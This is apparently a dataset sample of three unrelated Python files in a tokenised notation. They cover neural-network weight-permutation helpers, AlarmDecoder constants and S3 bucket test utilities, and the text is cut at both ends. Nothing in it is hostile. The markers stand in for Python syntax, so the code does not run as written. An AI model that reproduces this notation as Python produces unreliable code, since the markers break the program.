line_list[:max_words]]<line_sep>indl<augadd>[unk_id]<times>(max_words-len(indl))<line_sep><return>indl<block_end><def_stmt>bag_of_words line vocab<block_start>'''returns bag of words representation of given phrase using given vocab Args: line: string representing phrase to be parsed vocab: dictionary with words as keys and indices as values Return: integer list '''<line_sep>bag=[0]<times>len(vocab)<line_sep>words=split_line(line)<for_stmt>w words<block_start><if_stmt>w<in>vocab<block_start>bag[vocab[w]]<augadd>1<block_end><block_end><return>bag<block_end><def_stmt>repackage_hidden h<block_start>"""Wraps hidden states in new Tensors, to detach them from their history."""<if_stmt>isinstance(h torch.Tensor)<block_start><return>h.detach()<block_end><else_stmt><block_start><return>tuple(repackage_hidden(v)<for>v h)<block_end><block_end><def_stmt>process_x raw_x_batch<block_start>x_batch=[word_to_indices(word)<for>word 
raw_x_batch]<line_sep>x_batch=np.array(x_batch).T<line_sep><return>x_batch<block_end><def_stmt>process_y raw_y_batch<block_start>y_batch=[letter_to_vec(c)<for>c raw_y_batch]<line_sep><return>np.array(y_batch)<block_end><def_stmt>patch_h_weights weights L_next assignments# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256) <block_start><def_stmt>__permutate weight assignments L_next<block_start>new_w_j=np.zeros((L_next L_next) dtype=np.float32)<line_sep>new_w_j[np.ix_(assignments assignments)]=weight# TODO(hwang): make sure if this is correct <return>new_w_j<block_end>split_range=np.split(np.arange(weights.shape[0]) 4)<line_sep>h_weights=[]<for_stmt>indices split_range#logger.info("assignments: {}".format(assignments)) <block_start>tempt_h_w=__permutate(weights[indices :] assignments L_next)<line_sep>h_weights.append(tempt_h_w)<line_sep>#logger.info("equal: {}".format(np.array_equal(tempt_h_w, weights[indices, :]))) <block_end><return>np.vstack(h_weights)<block_end><def_stmt>patch_biases biases L_next assignments# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256) <block_start><def_stmt>__permutate bias assignments L_next<block_start>new_w_j=np.zeros(L_next)<line_sep>new_w_j[assignments]=bias<line_sep><return>new_w_j<block_end>splitted_bias=np.split(biases 4)<line_sep>h_bias=[__permutate(sb assignments L_next)<for>sb splitted_bias]<line_sep><return>np.hstack(h_bias)<block_end><def_stmt>perm_i_weights w_j L_next assignment_j_c<block_start>split_range=np.split(np.arange(w_j.shape[0]) 4)<line_sep>res=[]<for_stmt>i range(4)<block_start>cand_w_j=w_j[split_range[i] :]<line_sep>temp_new_w_j=np.zeros((L_next w_j.shape[1]))<line_sep>temp_new_w_j[assignment_j_c :]=cand_w_j<line_sep>res.append(temp_new_w_j)<block_end><return>np.vstack(res)<block_end><def_stmt>patch_i_weights weights L_next assignments# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256) <block_start><def_stmt>__permutate weight assignments L_next<block_start>new_w_j=np.zeros((L_next L_next) dtype=np.float32)<line_sep>new_w_j[np.ix_(assignments assignments)]=weight# TODO(hwang): make sure if this is correct <return>new_w_j<block_end>split_range=np.split(np.arange(weights.shape[0]) 4)<line_sep>h_weights=[__permutate(weights[indices :] assignments L_next)<for>indices split_range]<line_sep><return>np.hstack(h_weights).T<block_end><def_stmt>patch_i_biases biases L_next assignments# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256) <block_start><def_stmt>__permutate bias assignments L_next<block_start>new_w_j=np.zeros(L_next dtype=np.float32)<line_sep>new_w_j[assignments]=bias<line_sep><return>new_w_j<block_end>splitted_bias=np.split(biases 4)<line_sep>h_bias=[__permutate(sb assignments L_next)<for>sb splitted_bias]<line_sep><return>np.hstack(h_bias)<block_end><def_stmt>perm_i_weights w_j L_next assignment_j_c<block_start>split_range=np.split(np.arange(w_j.shape[0]) 4)<line_sep>res=[]<for_stmt>i range(4)<block_start>cand_w_j=w_j[split_range[i] :]<line_sep>temp_new_w_j=np.zeros((L_next w_j.shape[1]))<line_sep>temp_new_w_j[assignment_j_c :]=cand_w_j<line_sep>res.append(temp_new_w_j)<block_end><return>np.vstack(res)<block_end>
"""Constants for the AlarmDecoder component."""<line_sep>CONF_ALT_NIGHT_MODE="alt_night_mode"<line_sep>CONF_AUTO_BYPASS="auto_bypass"<line_sep>CONF_CODE_ARM_REQUIRED="code_arm_required"<line_sep>CONF_DEVICE_BAUD="device_baudrate"<line_sep>CONF_DEVICE_PATH="device_path"<line_sep>CONF_RELAY_ADDR="zone_relayaddr"<line_sep>CONF_RELAY_CHAN="zone_relaychan"<line_sep>CONF_ZONE_LOOP="zone_loop"<line_sep>CONF_ZONE_NAME="zone_name"<line_sep>CONF_ZONE_NUMBER="zone_number"<line_sep>CONF_ZONE_RFID="zone_rfid"<line_sep>CONF_ZONE_TYPE="zone_type"<line_sep>DATA_AD="alarmdecoder"<line_sep>DATA_REMOVE_STOP_LISTENER="rm_stop_listener"<line_sep>DATA_REMOVE_UPDATE_LISTENER="rm_update_listener"<line_sep>DATA_RESTART="restart"<line_sep>DEFAULT_ALT_NIGHT_MODE=<false><line_sep>DEFAULT_AUTO_BYPASS=<false><line_sep>DEFAULT_CODE_ARM_REQUIRED=<true><line_sep>DEFAULT_DEVICE_BAUD=115200<line_sep>DEFAULT_DEVICE_HOST="alarmdecoder"<line_sep>DEFAULT_DEVICE_PATH="/dev/ttyUSB0"<line_sep>DEFAULT_DEVICE_PORT=10000<line_sep>DEFAULT_ZONE_TYPE="window"<line_sep>DEFAULT_ARM_OPTIONS={CONF_ALT_NIGHT_MODE:DEFAULT_ALT_NIGHT_MODE CONF_AUTO_BYPASS:DEFAULT_AUTO_BYPASS CONF_CODE_ARM_REQUIRED:DEFAULT_CODE_ARM_REQUIRED }<line_sep>DEFAULT_ZONE_OPTIONS:dict={}<line_sep>DOMAIN="alarmdecoder"<line_sep>OPTIONS_ARM="arm_options"<line_sep>OPTIONS_ZONES="zone_options"<line_sep>PROTOCOL_SERIAL="serial"<line_sep>PROTOCOL_SOCKET="socket"<line_sep>SIGNAL_PANEL_MESSAGE="alarmdecoder.panel_message"<line_sep>SIGNAL_REL_MESSAGE="alarmdecoder.rel_message"<line_sep>SIGNAL_RFX_MESSAGE="alarmdecoder.rfx_message"<line_sep>SIGNAL_ZONE_FAULT="alarmdecoder.zone_fault"<line_sep>SIGNAL_ZONE_RESTORE="alarmdecoder.zone_restore"<line_sep>
""" Helper functions file for working with object buckets """<import_stmt>logging<import_stmt>os<import_stmt>shlex<import_from_stmt>uuid uuid4<import_stmt>boto3<import_from_stmt>botocore.handlers disable_signing<import_from_stmt>ocs_ci.framework config<import_from_stmt>ocs_ci.ocs constants<import_from_stmt>ocs_ci.ocs.exceptions TimeoutExpiredError UnexpectedBehaviour<import_from_stmt>ocs_ci.utility templating<import_from_stmt>ocs_ci.utility.ssl_certs get_root_ca_cert<import_from_stmt>ocs_ci.utility.utils TimeoutSampler run_cmd<import_from_stmt>ocs_ci.helpers.helpers create_resource<line_sep>logger=logging.getLogger(__name__)<def_stmt>craft_s3_command cmd mcg_obj=<none> api=<false> signed_request_creds=<none><block_start>""" Crafts the AWS CLI S3 command including the login credentials and command to be ran Args: mcg_obj: An MCG class instance cmd: The AWSCLI command to run api: True if the call is for s3api, false if s3 signed_request_creds: a dictionary containing AWS S3 creds for a signed request Returns: str: The crafted command, ready to be executed on the pod """<line_sep>api="api"<if>api<else>""<if_stmt>mcg_obj<block_start><if_stmt>mcg_obj.region<block_start>region=f"AWS_DEFAULT_REGION={mcg_obj.region} "<block_end><else_stmt><block_start>region=""<block_end>base_command=(f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '<concat>f"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "<concat>f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "<concat>f"{region}"<concat>f"aws s3{api} "<concat>f"--endpoint={mcg_obj.s3_internal_endpoint} ")<line_sep>string_wrapper='"'<block_end><elif_stmt>signed_request_creds<block_start><if_stmt>signed_request_creds.get("region")<block_start>region=f'AWS_DEFAULT_REGION={signed_request_creds.get("region")} '<block_end><else_stmt><block_start>region=""<block_end>base_command=(f'sh -c "AWS_ACCESS_KEY_ID={signed_request_creds.get("access_key_id")} '<concat>f'AWS_SECRET_ACCESS_KEY={signed_request_creds.get("access_key")} '<concat>f"{region}"<concat>f"aws s3{api} "<concat>f'--endpoint={signed_request_creds.get("endpoint")} ')<line_sep>string_wrapper='"'<block_end><else_stmt><block_start>base_command=f"aws s3{api} --no-sign-request "<line_sep>string_wrapper=""<block_end><return>f"{base_command}{cmd}{string_wrapper}"<block_end><def_stmt>verify_s3_object_integrity original_object_path result_object_path awscli_pod<block_start>""" Verifies checksum between original object and result object on an awscli pod Args: original_object_path (str): The Object that is uploaded to the s3 bucket result_object_path (str): The Object that is downloaded from the s3 bucket awscli_pod (pod): A pod running the AWSCLI tools Returns: bool: True if checksum matches, False otherwise """<line_sep>md5sum=shlex.split(awscli_pod.exec_cmd_on_pod(command=f"md5sum {original_object_path} {result_object_path}"))<if_stmt>md5sum[0]<eq>md5sum[2]<block_start>logger.info(f"Passed: MD5 comparison for {original_object_path} and {result_object_path}")<line_sep><return><true><block_end><else_stmt><block_start>logger.error(f"Failed: MD5 comparison of {original_object_path} and {result_object_path} - "<concat>f"{md5sum[0]} ≠ {md5sum[2]}")<line_sep><return><false><block_end><block_end><def_stmt>retrieve_test_objects_to_pod podobj target_dir<block_start>""" Downloads all the test objects to a given directory in a given pod. 
Args: podobj (OCS): The pod object to download the objects to target_dir: The fully qualified path of the download target folder Returns: list: A list of the downloaded objects' names """<line_sep>sync_object_directory(podobj f"s3://{constants.TEST_FILES_BUCKET}" target_dir)<line_sep>downloaded_objects=podobj.exec_cmd_on_pod(f"ls -A1 {target_dir}").split(" ")<line_sep>logger.info(f"Downloaded objects: {downloaded_objects}")<line_sep><return>downloaded_objects<block_end><def_stmt>retrieve_anon_s3_resource <block_start>""" Returns an anonymous boto3 S3 resource by creating one and disabling signing Disabling signing isn't documented anywhere, and this solution is based on a comment by an AWS developer: https://github.com/boto/boto3/issues/134#issuecomment-116766812 Returns: boto3.resource(): An anonymous S3 resource """<line_sep>anon_s3_resource=boto3.resource("s3")<line_sep>anon_s3_resource.meta.client.meta.events.register("choose-signer.s3.*" disable_signing)<line_sep><return>anon_s3_resource<block_end><def_stmt>sync_object_directory podobj src target s3_obj=<none> signed_request_creds=<none><block_start>""" Syncs objects between a target and source directories Args: podobj (OCS): The pod on which to execute the commands and download the objects to src (str): Fully qualified object source path target (str): Fully qualified object target path s3_obj (MCG, optional): The MCG object to use in case the target or source are in an MCG signed_request_creds (dictionary, optional): the access_key, secret_key, endpoint and region to use when willing to send signed aws s3 requests """<line_sep>logger.info(f"Syncing all objects and directories from {src} to {target}")<line_sep>retrieve_cmd=f"sync {src} {target}"<if_stmt>s3_obj<block_start>secrets=[s3_obj.access_key_id s3_obj.access_key s3_obj.s3_internal_endpoint]<block_end><elif_stmt>signed_request_creds<block_start>secrets=[signed_request_creds.get("access_key_id") signed_request_creds.get("access_key") signed_request_creds.get("endpoint") ]<block_end><else_stmt><block_start>secrets=<none><block_end>podobj.exec_cmd_on_pod(command=craft_s3_command(retrieve_cmd s3_obj signed_request_creds=signed_request_creds) out_yaml_format=<false> secrets=secrets ) "Failed to sync objects"<line_sep># Todo: check that all objects were synced successfully <block_end><def_stmt>rm_object_recursive podobj target mcg_obj option=""<block_start>""" Remove bucket objects with --recursive option Args: podobj (OCS): The pod on which to execute the commands and download the objects to target (str): Fully qualified bucket target path mcg_obj (MCG, optional): The MCG object to use in case the target or source are in an MCG option (str): Extra s3 remove command option """<line_sep>rm_command=f"rm s3://{target} --recursive {option}"<line_sep>podobj.exec_cmd_on_pod(command=craft_s3_command(rm_command mcg_obj) out_yaml_format=<false> secrets=[mcg_obj.access_key_id mcg_obj.access_key mcg_obj.s3_internal_endpoint ] )<block_end><def_stmt>get_rgw_restart_counts <block_start>""" Gets the restart count of the RGW pods Returns: list: restart counts of RGW pods """<line_sep># Internal import in order to avoid circular import <import_from_stmt>ocs_ci.ocs.resources.pod get_rgw_pods<line_sep>rgw_pods=get_rgw_pods()<line_sep><return>[rgw_pod.restart_count<for>rgw_pod rgw_pods]<block_end><def_stmt>write_individual_s3_objects mcg_obj awscli_pod bucket_factory downloaded_files target_dir bucket_name=<none><block_start>""" Writes objects one by one to an s3 bucket Args: mcg_obj (obj): An MCG object 
containing the MCG S3 connection credentials awscli_pod (pod): A pod running the AWSCLI tools bucket_factory: Calling this fixture creates a new bucket(s) downloaded_files (list): List of downloaded object keys target_dir (str): The fully qualified path of the download target folder bucket_name (str): Name of the bucket (default: none) """<line_sep>bucketname=bucket_name<or>bucket_factory(1)[0].name<line_sep>logger.info("Writing objects to bucket")<for_stmt>obj_name downloaded_files<block_start>full_object_path=f"s3://{bucketname}/{obj_name}"<line_sep>copycommand=f"cp {target_dir}{obj_name} {full_object_path}"<assert_stmt>"Completed"<in>awscli_pod.exec_cmd_on_pod(command=craft_s3_command(copycommand mcg_obj) out_yaml_format=<false> secrets=[mcg_obj.access_key_id mcg_obj.access_key mcg_obj.s3_internal_endpoint ] )<block_end><block_end><def_stmt>upload_parts mcg_obj awscli_pod bucketname object_key body_path upload_id uploaded_parts<block_start>""" Uploads individual parts to a bucket Args: mcg_obj (obj): An MCG object containing the MCG S3 connection credentials awscli_pod (pod): A pod running the AWSCLI tools bucketname (str): Name of the bucket to upload parts on object_key (list): Unique object Identifier body_path (str): Path of the directory on the aws pod which contains the parts to be uploaded upload_id (str): Multipart Upload-ID uploaded_parts (list): list containing the name of the parts to be uploaded Returns: list: List containing the ETag of the parts """<line_sep>parts=[]<line_sep>secrets=[mcg_obj.access_key_id mcg_obj.access_key mcg_obj.s3_internal_endpoint]<for_stmt>count,part enumerate(uploaded_parts 1)<block_start>upload_cmd=(f"upload-part --bucket {bucketname} --key {object_key}"<concat>f" --part-number {count} --body {body_path}/{part}"<concat>f" --upload-id {upload_id}")<line_sep># upload_cmd will return ETag, upload_id etc which is then split to get just the ETag part=(awscli_pod.exec_cmd_on_pod(command=craft_s3_command(upload_cmd mcg_obj api=<true>) out_yaml_format=<false> secrets=secrets ).split('"')[-3].split("\\")[0])<line_sep>parts.append({"PartNumber":count "ETag":f'"{part}"'})<block_end><return>parts<block_end><def_stmt>oc_create_aws_backingstore cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with aws underlying storage using oc create command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>bs_data=templating.load_yaml(constants.MCG_BACKINGSTORE_YAML)<line_sep>bs_data["metadata"]["name"]=backingstore_name<line_sep>bs_data["metadata"]["namespace"]=config.ENV_DATA["cluster_namespace"]<line_sep>bs_data["spec"]={"type":"aws-s3" "awsS3":{"targetBucket":uls_name "region":region "secret":{"name":cld_mgr.aws_client.secret.name} } }<line_sep>create_resource(**bs_data)<block_end><def_stmt>cli_create_aws_backingstore mcg_obj cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with aws underlying storage using noobaa cli command Args: mcg_obj (MCG): Used for execution for the NooBaa CLI command cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>mcg_obj.exec_mcg_cmd(f"backingstore create aws-s3 {backingstore_name} 
"<concat>f"--access-key {cld_mgr.aws_client.access_key} "<concat>f"--secret-key {cld_mgr.aws_client.secret_key} "<concat>f"--target-bucket {uls_name} --region {region}")<block_end><def_stmt>oc_create_google_backingstore cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with GCP underlying storage using oc create command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>bs_data=templating.load_yaml(constants.MCG_BACKINGSTORE_YAML)<line_sep>bs_data["metadata"]["name"]=backingstore_name<line_sep>bs_data["spec"]={"type":constants.BACKINGSTORE_TYPE_GOOGLE "googleCloudStorage":{"targetBucket":uls_name "secret":{"name":cld_mgr.gcp_client.secret.name} } }<line_sep>create_resource(**bs_data)<block_end><def_stmt>cli_create_google_backingstore mcg_obj cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with GCP underlying storage using a NooBaa CLI command Args: mcg_obj (MCG): Used for execution for the NooBaa CLI command cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>mcg_obj.exec_mcg_cmd(f"backingstore create google-cloud-storage {backingstore_name} "<concat>f"--private-key-json-file {constants.GOOGLE_CREDS_JSON_PATH} "<concat>f"--target-bucket {uls_name}")<block_end><def_stmt>oc_create_azure_backingstore cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with Azure underlying storage using oc create command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>bs_data=templating.load_yaml(constants.MCG_BACKINGSTORE_YAML)<line_sep>bs_data["metadata"]["name"]=backingstore_name<line_sep>bs_data["spec"]={"type":constants.BACKINGSTORE_TYPE_AZURE "azureBlob":{"targetBlobContainer":uls_name "secret":{"name":cld_mgr.azure_client.secret.name} } }<line_sep>create_resource(**bs_data)<block_end><def_stmt>cli_create_azure_backingstore mcg_obj cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with aws underlying storage using noobaa cli command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>mcg_obj.exec_mcg_cmd(f"backingstore create azure-blob {backingstore_name} "<concat>f"--account-key {cld_mgr.azure_client.credential} "<concat>f"--account-name {cld_mgr.azure_client.account_name} "<concat>f"--target-blob-container {uls_name}")<block_end><def_stmt>oc_create_ibmcos_backingstore cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with IBM COS underlying storage using oc create command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) 
"""<line_sep>bs_data=templating.load_yaml(constants.MCG_BACKINGSTORE_YAML)<line_sep>bs_data["metadata"]["name"]=backingstore_name<line_sep>bs_data["metadata"]["namespace"]=config.ENV_DATA["cluster_namespace"]<line_sep>bs_data["spec"]={"type":"ibm-cos" "ibmCos":{"targetBucket":uls_name "signatureVersion":"v2" "endpoint":constants.IBM_COS_GEO_ENDPOINT_TEMPLATE.format(cld_mgr.ibmcos_client.region.lower()) "secret":{"name":cld_mgr.ibmcos_client.secret.name} } }<line_sep>create_resource(**bs_data)<block_end><def_stmt>cli_create_ibmcos_backingstore mcg_obj cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with IBM COS underlying storage using a NooBaa CLI command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>mcg_obj.exec_mcg_cmd(f"backingstore create ibm-cos {backingstore_name} "<concat>f"--access-key {cld_mgr.ibmcos_client.access_key} "<concat>f"--secret-key {cld_mgr.ibmcos_client.secret_key} "<concat>f"""--endpoint {constants.IBM_COS_GEO_ENDPOINT_TEMPLATE.format(cld_mgr.ibmcos_client.region.lower())} """<concat>f"--target-bucket {uls_name}")<block_end><def_stmt>oc_create_s3comp_backingstore cld_mgr backingstore_name uls_name region<block_start><pass><block_end><def_stmt>cli_create_s3comp_backingstore cld_mgr backingstore_name uls_name region<block_start><pass><block_end><def_stmt>oc_create_pv_backingstore backingstore_name vol_num size storage_class<block_start>""" Create a new backingstore with pv underlying storage using oc create command Args: backingstore_name (str): backingstore name vol_num (int): number of pv volumes size (int): each volume size in GB storage_class (str): which storage class to use """<line_sep>bs_data=templating.load_yaml(constants.PV_BACKINGSTORE_YAML)<line_sep>bs_data["metadata"]["name"]=backingstore_name<line_sep>bs_data["metadata"]["namespace"]=config.ENV_DATA["cluster_namespace"]<line_sep>bs_data["spec"]["pvPool"]["resources"]["requests"]["storage"]=str(size)+"Gi"<line_sep>bs_data["spec"]["pvPool"]["numVolumes"]=vol_num<line_sep>bs_data["spec"]["pvPool"]["storageClass"]=storage_class<line_sep>create_resource(**bs_data)<line_sep>wait_for_pv_backingstore(backingstore_name config.ENV_DATA["cluster_namespace"])<block_end><def_stmt>cli_create_pv_backingstore mcg_obj backingstore_name vol_num size storage_class<block_start>""" Create a new backingstore with pv underlying storage using noobaa cli command Args: backingstore_name (str): backingstore name vol_num (int): number of pv volumes size (int): each volume size in GB storage_class (str): which storage class to use """<line_sep>mcg_obj.exec_mcg_cmd(f"backingstore create pv-pool {backingstore_name} --num-volumes "<concat>f"{vol_num} --pv-size-gb {size} --storage-class {storage_class}")<line_sep>wait_for_pv_backingstore(backingstore_name config.ENV_DATA["cluster_namespace"])<block_end><def_stmt>wait_for_pv_backingstore backingstore_name namespace=<none><block_start>""" wait for existing pv backing store to reach OPTIMAL state Args: backingstore_name (str): backingstore name namespace (str): backing store's namespace """<line_sep>namespace=namespace<or>config.ENV_DATA["cluster_namespace"]<line_sep>sample=TimeoutSampler(timeout=240 sleep=15 func=check_pv_backingstore_status backingstore_name=backingstore_name namespace=namespace 
)<if_stmt><not>sample.wait_for_func_status(result=<true>)<block_start>logger.error(f"Backing Store {backingstore_name} never reached OPTIMAL state")<line_sep><raise>TimeoutExpiredError<block_end><else_stmt><block_start>logger.info(f"Backing Store {backingstore_name} created successfully")<block_end><block_end><def_stmt>check_pv_backingstore_status backingstore_name namespace=<none> desired_status=constants.HEALTHY_PV_BS<block_start>""" check if existing pv backing store is in OPTIMAL state Args: backingstore_name (str): backingstore name namespace (str): backing store's namespace desired_status (str): desired state for the backing store, if None is given then desired is the Healthy status Returns: bool: True if backing store is in the desired state """<line_sep>kubeconfig=os.getenv("KUBECONFIG")<line_sep>kubeconfig=f"--kubeconfig {kubeconfig}"<if>kubeconfig<else>""<line_sep>namespace=namespace<or>config.ENV_DATA["cluster_namespace"]<line_sep>cmd=(f"oc get backingstore -n {namespace} {kubeconfig} {backingstore_name} "<concat>"-o=jsonpath=`{.status.mode.modeCode}`")<line_sep>res=run_cmd(cmd=cmd)<line_sep><return><true><if>res<in>desired_status<else><false><block_end><def_stmt>create_multipart_upload s3_obj bucketname object_key<block_start>""" Initiates Multipart Upload Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket on which multipart upload to be initiated on object_key (str): Unique object Identifier Returns: str : Multipart Upload-ID """<line_sep>mpu=s3_obj.s3_client.create_multipart_upload(Bucket=bucketname Key=object_key)<line_sep>upload_id=mpu["UploadId"]<line_sep><return>upload_id<block_end><def_stmt>list_multipart_upload s3_obj bucketname<block_start>""" Lists the multipart upload details on a bucket Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket Returns: dict : Dictionary containing the multipart upload details """<line_sep><return>s3_obj.s3_client.list_multipart_uploads(Bucket=bucketname)<block_end><def_stmt>list_uploaded_parts s3_obj bucketname object_key upload_id<block_start>""" Lists uploaded parts and their ETags Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier upload_id (str): Multipart Upload-ID Returns: dict : Dictionary containing the multipart upload details """<line_sep><return>s3_obj.s3_client.list_parts(Bucket=bucketname Key=object_key UploadId=upload_id)<block_end><def_stmt>complete_multipart_upload s3_obj bucketname object_key upload_id parts<block_start>""" Completes the Multipart Upload Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier upload_id (str): Multipart Upload-ID parts (list): List containing the uploaded parts which includes ETag and part number Returns: dict : Dictionary containing the completed multipart upload details """<line_sep>result=s3_obj.s3_client.complete_multipart_upload(Bucket=bucketname Key=object_key UploadId=upload_id MultipartUpload={"Parts":parts} )<line_sep><return>result<block_end><def_stmt>abort_all_multipart_upload s3_obj bucketname object_key<block_start>""" Abort all Multipart Uploads for this Bucket Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier Returns: list : List of aborted upload ids """<line_sep>multipart_list=s3_obj.s3_client.list_multipart_uploads(Bucket=bucketname)<line_sep>logger.info(f"Aborting{len(multipart_list)} 
uploads")<if_stmt>"Uploads"<in>multipart_list<block_start><return>[s3_obj.s3_client.abort_multipart_upload(Bucket=bucketname Key=object_key UploadId=upload["UploadId"])<for>upload multipart_list["Uploads"]]<block_end><else_stmt><block_start><return><none><block_end><block_end><def_stmt>abort_multipart s3_obj bucketname object_key upload_id<block_start>""" Aborts a Multipart Upload for this Bucket Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier upload_id (str): Multipart Upload-ID Returns: str : aborted upload id """<line_sep><return>s3_obj.s3_client.abort_multipart_upload(Bucket=bucketname Key=object_key UploadId=upload_id)<block_end><def_stmt>put_bucket_policy s3_obj bucketname policy<block_start>""" Adds bucket policy to a bucket Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket policy (str): Bucket policy in Json format Returns: dict : Bucket policy response """<line_sep><return>s3_obj.s3_client.put_bucket_policy(Bucket=bucketname Policy=policy)<block_end><def_stmt>get_bucket_policy s3_obj bucketname<block_start>""" Gets bucket policy from a bucket Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket Returns: dict : Get Bucket policy response """<line_sep><return>s3_obj.s3_client.get_bucket_policy(Bucket=bucketname)<block_end><def_stmt>delete_bucket_policy s3_obj bucketname<block_start>""" Deletes bucket policy Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket Returns: dict : Delete Bucket policy response """<line_sep><return>s3_obj.s3_client.delete_bucket_policy(Bucket=bucketname)<block_end><def_stmt>s3_put_object s3_obj bucketname object_key data content_type=""<block_start>""" Simple Boto3 client based Put object Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier data (str): string content to write to a new S3 object content_type (str): Type of object data. 
eg: html, txt etc, Returns: dict : Put object response """<line_sep><return>s3_obj.s3_client.put_object(Bucket=bucketname Key=object_key Body=data ContentType=content_type)<block_end><def_stmt>s3_get_object s3_obj bucketname object_key versionid=""<block_start>""" Simple Boto3 client based Get object Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier versionid (str): Unique version number of an object Returns: dict : Get object response """<line_sep><return>s3_obj.s3_client.get_object(Bucket=bucketname Key=object_key VersionId=versionid)<block_end><def_stmt>s3_delete_object s3_obj bucketname object_key versionid=<none><block_start>""" Simple Boto3 client based Delete object Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier versionid (str): Unique version number of an object Returns: dict : Delete object response """<if_stmt>versionid<block_start><return>s3_obj.s3_client.delete_object(Bucket=bucketname Key=object_key VersionId=versionid)<block_end><else_stmt><block_start><return>s3_obj.s3_client.delete_object(Bucket=bucketname Key=object_key)<block_end><block_end><def_stmt>s3_put_bucket_website s3_obj bucketname website_config<block_start>""" Boto3 client based Put bucket website function Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket website_config (dict): Website configuration info Returns: dict : PutBucketWebsite response """<line_sep><return>s3_obj.s3_client.put_bucket_website(Bucket=bucketname WebsiteConfiguration=website_config)<block_end><def_stmt>s3_get_bucket_website s3_obj bucketname<block_start>""" Boto3 client based Get bucket website function Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket Returns: dict : GetBucketWebsite response """<line_sep><return>s3_obj.s3_client.get_bucket_website(Bucket=bucketname)<block_end><def_stmt>s3_delete_bucket_website s3_obj bucketname<block_start>""" Boto3 client based Delete bucket website function Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket Returns: dict : DeleteBucketWebsite response """<line_sep><return>s3_obj.s3_client.delete_bucket_website(Bucket=bucketname)<block_end><def_stmt>s3_put_bucket_versioning s3_obj bucketname status="Enabled" s3_client=<none><block_start>""" Boto3 client based Put Bucket Versioning function Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket status (str): 'Enabled' or 'Suspended'. 
Default 'Enabled' s3_client : Any s3 client resource Returns: dict : PutBucketVersioning response """<if_stmt>s3_client<block_start><return>s3_client.put_bucket_versioning(Bucket=bucketname VersioningConfiguration={"Status":status})<block_end><else_stmt><block_start><return>s3_obj.s3_client.put_bucket_versioning(Bucket=bucketname VersioningConfiguration={"Status":status})<block_end><block_end><def_stmt>s3_get_bucket_versioning s3_obj bucketname s3_client=<none><block_start>""" Boto3 client based Get Bucket Versioning function Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket s3_client: Any s3 client resource Returns: dict : GetBucketVersioning response """<if_stmt>s3_client<block_start><return>s3_client.get_bucket_versioning(Bucket=bucketname)<block_end><else_stmt><block_start><return>s3_obj.s3_client.get_bucket_versioning(Bucket=bucketname)<block_end><block_end><def_stmt>s3_list_object_versions s3_obj bucketname prefix=""<block_start>""" Boto3 client based list object Versionfunction Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket prefix (str): Object key prefix Returns: dict : List object version response """<line_sep><return>s3_obj.s3_client.list_object_versions(Bucket=bucketname Prefix=prefix)<block_end><def_stmt>s3_io_create_delete mcg_obj awscli_pod bucket_factory<block_start>""" Running IOs on s3 bucket Args: mcg_obj (obj): An MCG object containing the MCG S3 connection credentials awscli_pod (pod): A pod running the AWSCLI tools bucket_factory: Calling this fixture creates a new bucket(s) """<line_sep>target_dir="/aws/"+uuid4().hex+"_original/"<line_sep>downloaded_files=retrieve_test_objects_to_pod(awscli_pod 